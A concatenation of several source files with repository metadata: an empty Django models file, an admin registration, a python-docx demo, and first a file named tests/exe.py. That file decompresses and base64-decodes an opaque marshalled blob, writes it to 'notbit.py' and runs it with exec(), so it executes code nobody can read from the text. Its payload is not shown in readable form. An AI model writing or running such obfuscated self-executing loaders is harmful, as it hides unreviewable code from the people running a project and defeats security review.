6a0f2b7a58a3c8b7affaa9282ffcc01b705d987b | 14,182 | py | Python | tests/exe.py | toutpuissantged/clickbot-monster | b8ccefb5078104ea91d30b9147cc59f92c70ed57 | ["MIT"] | 4 | 2021-02-11T13:43:55.000Z | 2021-11-14T20:16:34.000Z | tests/exe.py | toutpuissantged/clickbot-monster | b8ccefb5078104ea91d30b9147cc59f92c70ed57 | ["MIT"] | 3 | 2021-10-04T12:16:00.000Z | 2021-12-10T06:02:41.000Z | tests/exe.py | toutpuissantged/clickbot-monster | b8ccefb5078104ea91d30b9147cc59f92c70ed57 | ["MIT"] | null | null | null |
import marshal as ms
import zlib
import base64 as bs
data=b'x\xda\xedZ\xdb\x96\xaa\xc8\xb2\xfd\xa4\x06,\xbb\x8bG\xa1\x04A\xa5\x96\xa2\x80\xbc\t\x94\x80\\t/\xaf\xf8\xf5{F&\xe0\xa5\xac\xd5\xbd\xba\xcf^c\x9cs\xf6\x03\xa3,M"3\xe32cFd\xbe\x04\xafE\xaf\xd7[\x1b}\xf1\x18v\xa6yX\x8e\x87KW<\x05\x1dS0t\xf9\xa2\x16\xf9>\xd4\xe5*R\x95\xcb\x877\x1e\xaa\x85|\x19\x95V\x97\xc6\x06v\\.\xa4\xf3\xc5\xac\x94\xad\x9f*\xc7\xb0\xea\x1e\x16\xae\x98\x7f\x9b\tePNJCwv\xa14\x8fM\xc9\xda\xf9\xaeV\x99U6T\xd3q<\x95\x1c\xc1\x18\xe4\xc7\xc83\xe2\xa0\x13\x1d\x8c\x81\x9f\x04\x03\'\x0f+\xa5\x08\x0byo\xe8bwTB\xbe\xee\x94a\xa1\xedG\x85\\\xf9\xa7m\x12\xea\xf9j\xe9N\xe2ov\xef2\xbe,:\xd6%\x93\xd4B;-\x1dy\xb3\xf0\xac\x8d\xf1&\xd0\\\xc9b\xa6\xa5~\xb1\x10\xad\xc2L\xdfg\xe3\xcb\xfb[\x94\x8d\xd7\x93\xaeU\xf8kk\xdd\xab\xac7\x03\xbf\x8d\xcf\xe6i3\xf4u\xa70\x06J\xb5t\xbb\x82\'\x89\x17_\x94\x05\xec?\x1f\xeab\x1ev\xac\xc4\x97\xe6\xdb\xf7xc\x86\x03s\x8b=mLqW\x1a\xea.\x9e\xd2\x9a\xec\xee\x9b;\xd7\xde\xe9\x7f?\x8d\xfe\xf0uM\xf0\xbd\xe96p\xe7\x87\xa0\x90;C5;@O\x95_\xb2\xef6F\xea\x18\xef\xa9c\xe1\x99\x19i.\x9bU\xef\xbb\xd1\xf7\x8fa1?\xcc3g6u&\xf1\x10:0E!\xfe\x90\x9a\xf9\x1d\x99\xe9\xad\x98\xe6\xd0q\t\xf9\xab\xb0p.\xb0\xc9\x01\xba\xddD\x9e\xb9\x1b\xa9\xca\x1e\xdfo\x02i"\x9bB\xa49j\xc8\xd7|\x1d\x07\x9d)\x95\xefi\xa2\xefY\x02\xec\xd4~\xa6}Fzr\xf4\xd5S\\\xcb\xda\xc0V\x99\xef\x99\x97o\xde.u<+\x0fSQ\xc1:\x0e\x91j\xfcnd\xe2\xf1\xa3\xc8w\x81\xde?Z\xf6\xcb\xc9P\x13\x0f\xba\xcb`\xc7\x8b\xd1\xef\xce\x8d\xb7\xfei\xb4\xee\xfdah\xd16X\x8f\xab\xf7Jyy\x7f[l\x8d\xbev\n\xf5s\xeeHNjK\xb90\xba\xcc/V\xf5r\xb1\xd2\xde\xc6\x16\x92\xf9l~\xda\x19\xfay\xbb\xc4Z\xe1\x1f\xeb\xa5\xf4\x8aw\xac\r\xf9\x83o\xbfJ\x18\x0b\xb9\xb0\xe5lqx\x9fe\xf1\\\xd2\x8a\x85gn\xafrL\x19kg\xb6\x0b:\x8e\xf0m\xd6\x17\x870W\xa4;/\x91\x06[y\xd6)\x90\xba\x17\xdf\xee\xc9\xc6\xc0\x84n\x95cPZ9\xf9\xd9\xc7`2T\xa1\x8b\x857\x15CQ^\x07\xd24\'_\xba\xd1\x1f\xd91\x89\x06\xce\xc5\x93\xac\xa3\xaf\xcf1\xde\xcc\xf1\x7f\x15\xe4\xfbK\x04\xbbG\x9e\xb5ZHr\xe6\xdb\xd0\xe3\xe3\x9c\x8e\xd0\xd8\xef\x10\xb9b\n\xddbl\x92/\xa4\xddf8\xdb\x0c\r\xb5\x17\x1bz^`\xffy\x90&\x14g\x07\xec\xad\x8c\xd2,\xfe\xa6\xf6*\xd82fc\xe8\xa9}u\xa8FN(i\xa5?\xdb\xc4\xe1 
\x17\x96X\'\xe2&Y\xba/\x87p\x90\xc5!l\x1a\x14\xce*(\x9d\xfd\xa2pX\xec\xb52T\xe5\x14\x169\xec\x19\x97\xa3\xd9Kl\xbb\xddS\xe4M\xe2f,\xd6r\xa0\x07\xfb\xa8\x82B\x83Ne\xc4\xf5)\xf6\xe1\xf3\x81\xab\t\xb0y\xfe\xa1k{\xb2\xe7{\xda\xfbn\xad\xc7\xdd\xf1lQ\xc1."\xe2\xeb4t\xce\x87\x87\xf9\x98>\x97|\x1e\xc4\x10\xf9\xa2u1t\xed\xf0a+\xdf}/\x83\xce^c\xdfK\xb6\x91\xfar\x18\xa5\xe1VM{\xed\x9e\xf9\xf7\xf1\x19\xf6\x1c6k\x84\x1d\xe0\xa7\xd6w\xc4\x18t\xebW\x81$\xc4\x81+g\x91{&\x1c\xd9\x06\x1e\xf0\xa8D<\xc5\x9b!\xec\xb2\x03\x9e\xad\x80M\xc9P\xd7\xc4Hg\xb6\xc9\xa37q\x1e\x96NNr\x8dj\xbc\xfe\xd3\xe7D\xe3\x14o:?\xbf\xcd\x04Q3\xfa\xe6x&X#\xb5\xacmR\xc7\xf2l\xae\r\xa6\xf3\xee|b#\xbe\xd5\xd0T\x1dy\xd5\xec\xc5\x13\xe5\x95\'\xbe\xc6^\xc5\xf4\xc2?\x8b\xf4;>W\xf4{\xf3?t\xf0\xa7rO\xb1\xc7\xe5\x1e\r\x95\xbd\xf7j\x0cN1\xff\xfcz44\xfc\xa5\xff\xb5\x13~W^\rM^\xad\xfe\x8a\\[\t\xe9\x1d\x0frF\x1d\xcc\xd19C\xee\x19\xef\xf66\x1e\xfe\x1fj\x88M\xc8]a\xcc\x8a\xcb}\xfdK\xeb\xb5\xb1?\xed\xf5H\x0f\xc9\xa3\xf5r}\xb0\xcf!}\x1eu\xd8<\x90\xcd\x7f[i\xe4K\x9fp\xf2\xd3\\\xf8\xbeO8l2\xbd\n\xd7xyx&\xd2y\x8b\xb8\x8b\'\x85,P\xce\x03\x06\x00\xb3\x8d8Z\xf7\x0f\xe3\xe7\xef\xec\x7f8\xbf\x1a\x96\xc3\xc9\xb6\x8e\xa7D\x87\x9f\xe5\xa3<\xd7f\xfd\xf37\xa7b\xfbf2\x9e\xade\n\x1c4\xde6\xb7\xf9\xc4\x9e\xce)\x07\x84\xf1r0\x15\xc2\xc1\xf8\xf7Q%\x97K`{\xe4\x1a\x07\xf8\xf1~\xd4\x99"oNO\x91\x9b_\x10\xff\x88\xd1(\xf7\xd5\xd7[\x19\x9e\xdd\xcf\xe7S\xe8\xdc\x84\x1c\xe4\x93Ok\xe2:z\xdccF\xbe\xdd\x9f:\xd6\xdb<\xcb\'N\x1fi<U\xd4Y_~\xb3O\xdb\x16/<\xfd\x85\xfcC\x03>\x11\xde\x10\xc6t\r\xe0"tQ\x1a\x83k\xce6t\xf3\x18\xa9\xdd0`\xb1<\xe6\xfa\xd6\xe5S\xa4\xe7\xd0\xf9x\xd8\xe6\xd3J\xf9\x16\x0e\x90\x1f\x81\x93\xef\xa9\xc2\xc7\x17\xf5\xb8\x14X\xad\xed\xd2\xa9.\x97\x88\xf5#\xe6\x00n\x92\xfd\xf6\xab\x05\xc9K\xe1\xdb\xd9y\x0b\x9c\x02f\xe7\x07`\xc2n\tL\xf0$\x9a\xdb\xd8\x19\xaa\xa9N\x84\xa4y\'\r:\x93t\xa4\xf6R\xb7\xb0\x92PJ\x9e\xc82!\x8b\xcd\xb3\x0e\xf4|\xbd\x14e\xf6\x8eg\xf7\xd6w\xebO\x95\xdd\x12\xf9\x82\xf65\xe7\xfb\x88\x17\xf7\xfb\x8b\xf1\xfe\x05\x9c\xa9C\xb63\xf4\xae\x18\xb8\xc89\xd0\xa1\xdf\x19\x0f\tG\xdb\xef0/t&\x10\xd6r\xdcu(G`,\xb8\x84\x9d\x1c\xb9n^\xb6M\x0eh\xf4\xa6\xda\x86Ikn\xf0\x10\xb9o\x07\x0e@\xbe\xcc\xf5\xedY\xdf\xc9.\xcc\xb7\x81\xad\xa1\xe4\x80\x83Y\x02\xb3K\x0f\\\n1\x00N\xc0d\xd5\xb8\x1c\x0fU\xc3$\xfb:R\x02\xbd\xc4\xf5\x9e\xa6G\xc6\xd5l\xa5\xb3\x80\xbf\xc3\xc6\xf8\xdf\x14\x83\xf5k\xfa\xd9o{\xf8.y\xe79\x0e\xdcN\xea\xee>\xec\xec~\x9cc\x81\x9fP\\\x80K\xa4\xbd-b\'A\x0cvh<x\xdd&\xe8(,\xdf\xb8\x92vY\x8a\x02\xe2\x0c9H\x93\xd7K\xe4\n\xf8\xda\x8e\xf2\x08\xd6q\x89$\xa7R\xe3\xcc\xc4^\xd7\x7f\t\xbbo\x1e5\xc6\xfe;\xf9aQ)\x99\xef.\x907\xb4m\x90\xc6w<\xaf^\xef\x00\xf1\xae\xcd\x90\xe3\x8c\xc1\xc3:\x9e\xef\xa9\xd5\xb3\xefN\x0e\xd0eJ\x1c\xa4\xf5\xf5Sf2_\x9es?E\xfe\x80\x9f*o\xad\xcc\xbe\xb6n\xfcg\xe6\xc2\x0f\xec:~\xe2l]\x8f=6\xb1\xa2\xc6y\x1b\x93F\xbf\xf5\xbb\xdf\r\x8d\xe7^\xd5\xade\xd51\xe4\x14\xf9e\xe9q\xff\x87\xec\x0b\xe3\x0e6\x8b\x91!\xc5\x8e\x91\x033\x85\xdb9^\xb8\x0f\xf76&pa\xc2\xe7R(\x1e\xe2\xc6F\xc8\xb3,\x0e\x8cA\x84\xb8\x89[_$,\x08O\x1b\xf3\'\xfc<YtZ?7U\xaf\xc6\xd6^\x96\xaa\xb4\xc6\'2H\xafX\x97B~\x1c1\x8e\xaa\x08A\xa5\\|\xe4\xffE\x87\xc7#t\x04?G|\xc3\x1e\xb4\xde\x9a\x83\x80\xf3\xe6\xe0H\xa8A\xd48U\xc1UT\'B\xfd\xc0\xdf1;\xe3\xb8\x1d\xff\xd4\xf7\x15\xac\x99r\x81\xf0\x9b\x91\xde\xe5\x05\x96\x7f\xf0\xddf\xd6\xf2(\xf9\x10\x0c\xb2\xed\xc3\xb8\x9a\xe7\xf7\xd2\xf7\xd4\x88\x876\xb3\x15\xf8e\x84=\xc0Vj\xa3\x8bn\x80\x9a\x06XV\xdb1G,\xc49\xf4?\xbd\xdb\xcf5\x16r\xaa\xc1\xae\xb14\x13\xda}\xb8\x17%\xba\xd3\xab\xde\xc8\xdc\x9d<\xbb\xf6[\xe8\x94\xf3;\'3R\xaciB>\xc79\x16\xe3\xa6\x03\x05\xf5E7\xbf\xdaB\xd
9\xc2\xfe\x07\xf2\x07pip\xd9\xbcX\xe2]u\xc2\xe6ac=\xa9\x19K\x9c\x1b5c\xd5M\xc2"\x92\xdc\x8b\x16\xb1\xd8\xc5\xb3\xa4\xf8\xe3\xd8\x89\xbaRI\xe0G\x07\xe2{\xe0\xdb\x97\xa1j^\x88\'\xb2\xbd\xa6\xd9\xef\xec\x1d\x17\xe3\n\xf1\xbb\xaf\xe7\xd5\xc3\xefC\xe2\x17\x06\xfcU\xb5\x81\x7f\x92L1\xb5\x86\xcf\x92_\x10\x9e\xe7\x88A\xec+o>\x13\xfe\xcd\xc9_\xfc\x8e\x99\x04,&\x1d\x16O\x88a\xc4\x07\xc5\x0e\xcf\xab\x8f\\\x1aX\xdb\xd4\xa2\xf0\xcdk\xfdI>\t[\xc2W\x90\xd7\xf5F^\x97\xea\x03\xd4\xcf\xc9\x898\xba\xef\xc8u\r`P\\\x9b\xa8\x0bi\x1dI$i\xe0\xb8\xed:\x0f\xa8\xb7\xa8\x1e\xcd\x19\xbf\x9d\xd0s\x8d\xf7I\xc7\xa9P\x9bP<&\x0b\xd4#\x11l\xfa\x9e\xde\xe4\xfa\xcc\xf2\'\xf3\x17^Kv\xf6\xa8\x9f\xba\xc5\x12\xf5\x1cj\x12V\x9f\xaf\xec\xe4\x0f\xaaQY\xdc\x14\xdd\x046\x979g\x7f\xc2s\xb0F\x8e_\xd3U\xe0Y\xa5\xd7\xe1\xb5l\x8d}>\xb8\xf0x&\xd2\xdc\xbdr\x8e\x1a\x11v9\xf8U\xef\x18q\xbc\x89\x89\xb3\x00_\x0f\xbez\xcbELm.8s\xa6\xaf\t\xb7\xd7\x1c\xf5\x15\xf1\xf5\xeb\xf8V\x06\xed\xfd\x93~B\x9aKCm\x08\xfb/\xdc(\x1f>\xe03p\xae\x1cu\xfc-\xec(0<\x9c\xd4>\xadQ\x9dg"\x96\xf9o5o\xd9\xf8\xb0\x81?\x18\xd3\\=\xe2\x05>t:*\xe4\xc3Pw$\xfa\x0c\xdf}\xf7\xbd\xc8j\xe7\xd3-\xd8|\x8a\x1a\xf9q^\xe4\xd4\xc2:\x06.\xf4p\xa9\xeb\x0b\x9b\xd9\xef.\xe7\xf0\xbdQ,\xc3\xcf\xeb9\xa8\x16\xac\xd7I\x8f\t]m}`\xf3\xc2=\xaf"O\xc90\x1f\xab\xa3|\xcfg:x\xf6;\x8f\x11\x8a\xd7i7\xd4\xe7\x9bgc\x86\xe0\x8e\x88c\xc2z\'\xd4Q\xd7\xea\xcelI=\x9e~\xdb\xf3\xe0\xb16a\x98B\xbe\x8d\xdawZ\r1f\xe9\xa2\xae/\xb4\x9d\xd7qN\xac\xdfaw[\x1b\x8c\xd4\x08u\x95\xb2\xfbp\xe4=t\xfc=\xf2z\xe5\x10z\r\x8aI\x1c\r\xf2\x13\xe33E^B\xe7\tt&\xf2\xb9\xe7\x87\xa0\xcdG\xdd\xc7\xf7\xb7\xc0\x9e\x8b\xa1\x01C\xf4s\x17u*b\xaa\x9b\xcf\\\xadZb~\x86i\xd0\x93J6P\x811\xb5\x1e\xa9_\xf4\xc3u\x96\\\x1e\xe2\x0bx\xb4\x17C\xb5[Q\xff\x82prT\x98"\xf6JuA0\xd6\x84\x03\xf5D\xb8.2\xd3\xe8<\xce\xd3\xea\xeb\x80x<\x05\x83|\x15\xd4k\xc3\x1c\xc7\xa8\xc3e,J\xcaY\xc8\x97"\xe1mW\x0c\x8b\x13\xb3/\xf3\xfdIc/\x92}\xc5\xd4\x19|\xcf\xe7\xfe\xc0\xc6<\x8bAS\xbc\xf5\xe1(_\x94\xd6\x96\xf49J_J\xaai\x9bw)\x7fC\x9f\x17\xf8\xb8\xb0\xd4\xe7T[\xec1\xd7\x11\xb6\xbdYKf\x0e\x07\xf7=\x10\xea\xa7\x00\x8b\x05\xafs\xed\x97\x0c\xa9\x7f\x82\x9a\xe3\xbe\xa7\x92\x90\x9cm\xa3\'\xe0?b\xd9\x02\xfe\x93}\xfb\x84o\xaa\xefR\xdd\x9d\x17\xa8\xcfg\x01\xf43\x1cP\xdf\xe5\xae\x97\x05.\x12m"]\xdcQ\x1e\xa0\xf7C\xce}j\x1d\x81\xb3\x0f\xa6\x883&\xef\xc4\xf6\xe3\xc8\xe4\xcf\xc9\xa8\xf0ak(S\x9an\xa34\xdc\x19\x83\x1d\xf5%\x11o\xe3\xf2=\x8d\xca\x91g"?i\xe0H\x88Y;\x92\x87\x8d\xde\xeb8\xabu\xf4\xb6\xf0\x14a!%\t\xf2~N5\x05\x9e\xec:?\xf5g\xaekXzc\x9e\xb7\xfa]\xe4\x86&^X\xccp\x9c\x066\x85R\xb4\xc2\x9e\x81\xbfI\x8b{S\xc6\x13\xa3\xa7s\x19v\xf8\xc8\'J\xe0\xd5\xf7\xa5\xa7\x9c\x98\x8du-\x0b\xab\x97\xc3(\xaf9\xde\xa4\x99\xf3\xc6\x97\xea\xbd\xb0\xfa\x05\\&\xd2\x93\x1c\xb9\x172z\xd7\xf1\x9frT2@\xed\xa0\x82[\xbc\x01\'v\x8bB[/\x85\x9a\x93\xe4\xb0\xbd\xe7\xc0\xfe\xa89\xe2\xeb|\xe0\x0by\xb8\x16a\xf73\xf5\xb2\x10\xe3\xdd<PO7k\xca\xd9\xfe\x91#\xe5\x16\xaf\xaeq\xbe\xf5\xef\xc72;~s\x7f"\xae\x9c\xbb\xb8:#\xae\x98\x8c\x9b5\xa2\xb6\xe0\x1c\xa3\xcd1u\xadF\xbdh`u\xd6\xd4\xaf4fr\xcd\xd7\xc8\xfbI\x1eQ~\x1d\x8c\x0f\xb3\xc2\xe9\\\xf9rB8/\x84\x97O\xfb\x8eY\xcd(\x89\xf0\xc3PvP\x1f\xf9v\xc6|\x17\xd8\xd9\r\x8aq\xcc\xfb\xccQB\x98\x0f\xac\x15\xc3r\xbc\xa9\xf5\xc29/\xf4\xd5\xe0\xd3-\xc6\x83\x1fw\x10\xef\xbcG9\xe1|\xc9\x14\x19\'\xcd\xa9\x06G\x9dQr>}\x83\xdd\xb5/\xfc 
o_\xeb\x1a}Q\xde\xf7\x9a\x9fs\x00\xf8\x94\n\xdf\xc0~\xad\xbc\xe1\x85L\xb7\xf6X\x06\xd7\xe4\x8f\xad\xcc8\xd7i\xfa\x8bJ\xda\xbc\xc3d\x08\xd7\xfc\r\xae_\xef\x7fz\x19e\xdd<\x12\xda\xf5oH\xaf\xd0\xbdL\xd8K}>p\\\xec\x93\xfa\xc39\xeb\x81P,|s\xa6U\xe4\xce\xb7,\x96m\xeb.\xb7\x82\xf7\xae\x811\x14\x83\xed\xfc\x0f9\xd64\xda=3\xfe\xc5\xed\x8d<\xb0\xf0(f\x9d\x17\xaa{\x88/0}\x0b\x9a\x84x\xd9-\\s\x07\x0cme\xd2\xb9G\x90*\xad\xdd\xde\xe3:&m\xeb\x07\x18p\xd3\x1bz\xd0=\xea\xc5\xf2s]\xc9e\xde\xd4`\x8d\xdd\xa9\xdf\t\xae\x9c\xfd2\xceB\xbc,r)\xa72<\xf9\x07\xfe{\x83i\x83)\xf5"X\xce\xfa\x1b~|\xc3?k\xae[\xafae\x7f\xc17\x81\x03\xb3\xe2\x15u\xa4L\x1c\xbbbgOz\x9e\xfd2\x0c\x00\xef\xf2:|\xceG\x9f\xbc\xe2\xe3\r\xc7(\xcd$\x12e\x96\x87[n\xa7F\xc8\xa1f\xf5\xc1\xce\x1a\x10+\xc8\xd3T+2\xae\x04\xf9\x86~\x06\xaeQ=\xa9\xc0o\xe1\x17\xe0\xdeK\x17\xf5|#\x7f\xb6\xa9q\xf1/\xe5\xaa\x9f\x9c\xebk\x1fn\xea\xcf\xbbs\xb6\x1ak\xdc\xb93\x9e\xf5e\x8f\xf5pE+\x0f\x8a)\xe91n8<r\x15\xfcS$.\xf9\xb5\xfc\'\xb5\x17t\x98y\xd7X\xdf|\xc2\x145l\xea\x8c\xf2\xce?\\\x92\xffkk\x02\xf0\x89g\xf5\xc0\xcf\xf8\xc5\x01\xb5.0!\x8cI\x0e\xf8\xc2\rn\xfd\x8f\xf9\x00j\xc6y\x0c\x0c\xca\xb9\xfd\x81\xdd\x15\xd3\x13\xbe\xf3\x93%\xb0qQ\x9c\xf3\x1fa\x99\xcak^\xc4\xb4"R=;g\xe7q\xd4w\xe9v\r}\x9f\x7f\xd8\xacf\xcf?\xf4\\\x00.\\\xb9\x8e\xeb\xbc\xc0N\x9b1\xeb\x998\xbb%\xc3z\xde\xff\x00\xe6@7m_\xe3\xec1\xdd55\xf3\xb5\xa7\x02\xde\xc0\xfb\x94m\x1fG\xcc}\xd5hr\xdc\xdb\x12\\l\xc9\xcf\xb3y\xbdn7gv\xc6\x95\xf3\r\xac\x13\xf2\xdf\xd6/\xf2\xdc\xef\xfd\xb7\xdf\xf1\xff\xa1\xdfq\x87It\xbe@\xfe~\xedml\x1b\xfb\xc2\x87\x1a\x0eD\xb9`\x0f\xff\xcc\x0c\x95\xce\x11\xa6\x17\x9e\x0b\x88\x03R\x9f\xa3\xc6\x93\x92\xc9]]c<\xf9\x94W\xcc\x8a\xbf\x7f\xd7\xc7\xb8\xd6\xea\x9c\xe3\xb3\xbe>\xec1\xff\x0fq,W\xbb| \xbfQ\xbd\x82\xd8\xf8\x17;o\xe9\xf0^\xca?\xc0+\xb2_\x072\xc0\xc5\xfbWlb\xf1\xff%^\xb5\xb8\xca\xf2H\xf5\x9f\xae\xfb\x9f\xe2#F;\xf6LUz\x1f\xad\xee\xce\xcc_\xc0;\x9a\x9au\xd8\xd6\x8dj\xf8[\xcd\x15\xef\xd7~ij\xf4\xdb=\x91\x7f\xd6\xf75l\xca_Z\xb5\x90\xe2M\x98F\xac.\xf2\xd4\xd7\xcd(\xdd\xfc6tN\x90y\x8a[?a\xeb\x0b\xb7\xa3"\xaaX}\xfd\xd6\xaf\xd7\x01_\xd0\xdb5\xb0\xde\x02\xe9\xf5\xe1\xbd\xb6~\xbd\xf9\x9e\xc5\x0e\xbf\x071\xa7~\x1bt\x86\x98\x1f\x18%b|\xef;\xa7\xe3P}\xf9\xd7\xb7*+\x81\x0f\x0f6\xc9\x0e\xc0\x98c\x04\x8e\xc8\xb0\xfa\xa6>}\x16[~\xda\xe6P\x16_\x93\xc1\xfeA\x1f\x8e|\x9f\x07\xfe<\xcf?\xee\x83\xf7\x03\xb9\xbf^k\xe7MS/_\xfd\x90\xf7\x02\xf99G\xe3{\xf5\xb8\x9f\xe4\x87\x8f6\xfd:\xb6&\x8f\x1c\x91t\xdd\xcd}M\xc6{\xb2HgG\xf7\\\x9bt\xc08\x14\xf8\xd6\xf3~\x14auk\xd3G\xcc\xa1\xbcWF\x98\xe3\x06w\xbc\xf1gn\xa47s\xdc\xf9\x19\xd3\xe7]\xef\xf6S]\xad\xedY\xfd\xf5\xeb\xf0\xa8\xae\x89\xa8\x9f*\xb2\xfc\xf0\x0f0\xc9\x0f:\xf3v/_\xd6x?\xe0\xb2S\x11\xbc\x89\xe7\xa3\xcfu%\xe7St\xae\xf7E?\xbc\xcd#\xef\xc8\xe3{\xfa\x9d\xf5}N\xbfL\x97\x87@\x94\x89\xcf\xfd\xfd\xfaN\xfa\x9a\x17\xfe\x1d}\xb6w;D\x0b~kv\xd9=/:\xaf\x02\x8f 
.\x1a\x10_G\x0c\xf2\xfe\x18\xb8E\xa1m\x03]K\x03\xdd\xf9\xa1\x9e\xb9/\xf0\xb3\xc0\xa1\x1aMX/\xb2\xa23\xb4,^Jt\xafa\x8a}0\xce\xd9\xf4T\xf9{\xd7\xfbH\xa6O5\xcf\x97\xe7n\xe6W\xe7n\xd5\xd7\xe7n\xf9#o\xa2\\p\xbd\x13F\xdc\x96\xf5vYo\xfe\xc0\xcfc\xc7\x87\x10\x98\xb3T\xbb\xc4\x99/\xb0\xfd\xc6\xa0\xfei\xc7\xa23\xd5\xb4\x8d\x01\x8c\x0b\xdc}\xb6\xf4\x8c\xfb\xdf\xe9,U\xed\xc5\r\x07\x06\x97=\xb0\xbb\x02l\xff5\xe6Q,\xbb\r\xfe\xd1\x99\xf2\xf5\xae\xc7\xa4\xc6\x15\xe8\xb0\xe5\xa7#~\xf7\xe4q/\r\x7f\xe4\x98\xe2)[\x0f\xbe\x1aJ\xf1\xf6\x0bn\xc4\xf9\xc5\xe0\x91_3=\xed\xb9\xfd>\xe5\x02vG\x92\xf2J\x8bQ^{g\xee\r1Q\x91l\xaa\x15\x10\x0b\x84\xad\xbf\xdf\xf2\xc0\x89\x98+\xb7}1\xea-\x87XG\x93\x87\x86\x03\xc6/E\xe4C\xba\x1b\x07?\x16\xb6_\xd7:\xcf\xb8C|wN\xb6,d\xc6\x0b\x1a\xae\xf8\xf4\xac\xeaZ\xfb\x82{n\x8f\xc8\xdf\x7f\xffL\x8c\xbf_\xde\xe2\xb7\xcd\xd7\xc0\xce\x06Z\x9c\xff\xdf\xc7%\x19n\x07\x9eC\xf7n\x98\xcc/\xb1\xc6\xbd\xe1ld\xc3\xfaN(qq\xaca\xbdT\x93\xaa\xee\xb1\xee#\xba\xdf\xa03\x9d\xc5\x135>\x0c\xd7t\xf7\x8d\xe1\x02\xb0\xe7\xa5\xe4wok}\xdb]\xc4\x83\x0c^\xc9\xb1\xe1\x07|\x87\xdd\xb9`\xfd\xaf\xbe\xf2\xc7cn]\xd9\xf5\x1d\xc8[\x1e\xf9#;=\xc9\xf1\xc3>\xad\xb9\xdb\xde-\x99\x17\xce9rI7\xc9#/\xd9\xfe\xc9Z]\xdf3\xb7~\x99\x137\xbb\xc3\xc1z}tO\x80\xddg\x01v\xf2\xf3%Zg\xd1\x9c\x9d|\xf2\xd3\r\xdd\xff\xa6\xfbT\x13I\xdb\x05\xba\x89\x9an\xafp\xfc4\xed\xf6^r\xaf9\xdbSr\xe0\xc6\'\xdfj\xb8\r[\xab\x94g\xcf\xce\x0en9\x10\xd5\x02\x8b\x99\xd8\xe4\xe3\x9f\xaf\t\x1c\xe1\xc0d\xd4{\xe7\xfd\x9b&N9\xbe\xd4\xfd}\xc6a\xeb\x1e\xff\xaf;O&\x1dk\xf2&\xa0Z\xb9\xaa\xb9\xa9\xda\xf4\x10\xfeJ\xaf\x9b\xf2I\xaft\xc17\xc1\xfb\xc4\x90\xdd\xeb\x98&\x1f_\xf7\x8d\x18\xee\x92\x0f\x03\xc3\xc1\xf5\xcd\xcb\xb3Z\x81\xee\xd5\x04\x14+\x1d\xba_\xc6\xea\x05~\xd7\x97\xf8\x15\x9d\xd5\xdd\xdc\xb3\x7fR\xbb|\xdd\x9b\xca"{:w\x9a\xbb\xf7\xb3\xc8\xb5\xd6\xecN\xb1\xadL\xd8|T\x17s\xbf\xfb\x83\xfd%\xbc\x15k\xfdt\x84\x9b5\xd0]d\xc6\x85\xff\xcb\xc9\xfe\xefp\xb2\x8b\x7f\xd7\xff\x8bS\xee\xd79\xf9&\xf5f\xc0\x9b\xa6\x9b\xfa\xdc\x1c\x7f\xad\r\xf9!\xefg6\xf7\xe6^\xe2i}\x1f\xbd\xe6e\xac\x1f\xa9\x92\xde\xe3\'\xb9\xb7t\x90\xc3\x10Wz\x0e\xfbN\xb7\xa1\x84\x98\x05>/`\x07_e\xfcf\xc8k<p\xae\x8as\x94\xdaWV\x81.\x1f\x913\xb6\xc0"1\xc8\x89\x93\x00C4:\x83\x17Ot\xdf\r>\x0fn\x90\x1f\x86j\xb6\xfd7\x0f\xc0\xa6&'
val = zlib.decompress(data)
val = bs.b64decode(val)
val2 = ms.loads(val)
fw = open('notbit.py', 'w')
fw.write(val2)
fw.close()
exec(val2)
print('done')
| 834.235294 | 13,981 | 0.733042 |
6a0fb21e21040834df2f296f7650980a669e7a30 | 374 | py | Python | apps/gamedoc/models.py | mehrbodjavadi79/AIC21-Backend | 9f4342781f0722804a2eb704b43b52984c81b40a | ["MIT"] | 3 | 2021-03-12T18:32:39.000Z | 2021-11-08T10:21:04.000Z | apps/gamedoc/models.py | mehrbodjavadi79/AIC21-Backend | 9f4342781f0722804a2eb704b43b52984c81b40a | ["MIT"] | null | null | null | apps/gamedoc/models.py | mehrbodjavadi79/AIC21-Backend | 9f4342781f0722804a2eb704b43b52984c81b40a | ["MIT"] | 2 | 2021-01-29T14:52:53.000Z | 2022-03-05T10:24:24.000Z |
from django.db import models
# Create your models here.
| 28.769231 | 71 | 0.719251 |
6a0ff32b449d925c6b914b62185f0b337c8c4a7c | 133 | py | Python | assignment/users/admin.py | LongNKCoder/SD4456_Python_Assignment_2 | 8a1b64f0b4169585fb63907016f93a7ab15da0a7 | ["MIT"] | null | null | null | assignment/users/admin.py | LongNKCoder/SD4456_Python_Assignment_2 | 8a1b64f0b4169585fb63907016f93a7ab15da0a7 | ["MIT"] | null | null | null | assignment/users/admin.py | LongNKCoder/SD4456_Python_Assignment_2 | 8a1b64f0b4169585fb63907016f93a7ab15da0a7 | ["MIT"] | null | null | null |
from django.contrib import admin
from users.models import Friendship
admin.site.register(Friendship)
# Register your models here.
| 16.625 | 35 | 0.81203 |
6a10bfc3e38883e78cd876111e7b6300fd43d471 | 529 | py | Python | python/Word/demo_doc.py | davidgjy/arch-lib | b4402b96d2540995a848e6c5f600b2d99847ded6 | ["Apache-2.0"] | null | null | null | python/Word/demo_doc.py | davidgjy/arch-lib | b4402b96d2540995a848e6c5f600b2d99847ded6 | ["Apache-2.0"] | null | null | null | python/Word/demo_doc.py | davidgjy/arch-lib | b4402b96d2540995a848e6c5f600b2d99847ded6 | ["Apache-2.0"] | null | null | null |
import docx
doc = docx.Document('demo.docx')
print('paragraphs number: %s' % len(doc.paragraphs))
print('1st paragraph: %s' % doc.paragraphs[0].text)
print('2nd paragraph: %s' % doc.paragraphs[1].text)
print('paragraphs runs: %s' % len(doc.paragraphs[1].runs))
print('1st paragraph run: %s' % doc.paragraphs[1].runs[0].text)
print('2nd paragraph run: %s' % doc.paragraphs[1].runs[1].text)
print('3rd paragraph run: %s' % doc.paragraphs[1].runs[2].text)
print('4th paragraph run: %s' % doc.paragraphs[1].runs[3].text)
| 44.083333 | 64 | 0.680529 |
